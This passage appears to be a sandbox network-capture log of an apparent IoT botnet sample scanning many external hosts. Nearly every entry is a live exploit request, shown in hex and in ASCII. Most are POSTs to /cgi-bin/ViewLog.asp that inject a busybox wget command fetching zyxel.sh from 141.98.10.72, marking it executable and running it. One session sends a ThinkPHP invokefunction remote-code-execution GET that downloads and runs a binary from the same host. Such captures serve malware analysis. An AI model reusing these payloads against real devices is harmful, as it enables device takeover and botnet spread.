Feb 14, 2024 09:30:35.160224915 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
147	192.168.2.15	60660	31.136.216.123	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:13.994944096 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:29:14.682588100 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:29:16.026695013 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:29:18.874414921 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:29:24.250391006 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:29:35.001986027 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:29:58.297499895 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:30:41.304172993 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
148	192.168.2.15	34804	112.216.115.50	80

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:14.015912056 CET	331	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 14, 2024 09:29:15.578522921 CET	331	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 14, 2024 09:29:15.895912886 CET	321	IN	HTTP/1.1 400 Bad Request Server: nginx/1.21.4 Date: Wed, 14 Feb 2024 08:29:15 GMT Content-Type: text/html Content-Length: 157 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 31 2e 34 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.21.4</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
149	192.168.2.15	47632	31.43.30.79	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:14.021120071 CET	326	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:29:14.746555090 CET	326	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:29:14.981376886 CET	94	IN	HTTP/1.1 404 Not Found Date: Wed, 14 Feb 2024 08:29:14 GMT Connection: Close

Session ID	Source IP	Source Port	Destination IP	Destination Port
150	192.168.2.15	39436	94.123.121.73	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:14.021744013 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
151	192.168.2.15	47998	31.136.88.71	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:14.493546963 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:29:15.162693024 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:29:16.506561041 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:29:19.386547089 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:29:24.762353897 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:29:35.514050007 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:29:58.297379017 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:30:41.304243088 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
152	192.168.2.15	35696	31.136.93.200	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:14.493663073 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:29:15.162671089 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:29:16.506556988 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:29:19.386435032 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:29:24.762264013 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:29:35.514029026 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:29:58.297367096 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:30:41.304177999 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
153	192.168.2.15	33846	31.200.74.194	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:14.517339945 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
154	192.168.2.15	41428	94.120.32.199	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:14.517685890 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:29:15.802683115 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:29:17.306521893 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:29:20.410406113 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:29:26.554297924 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
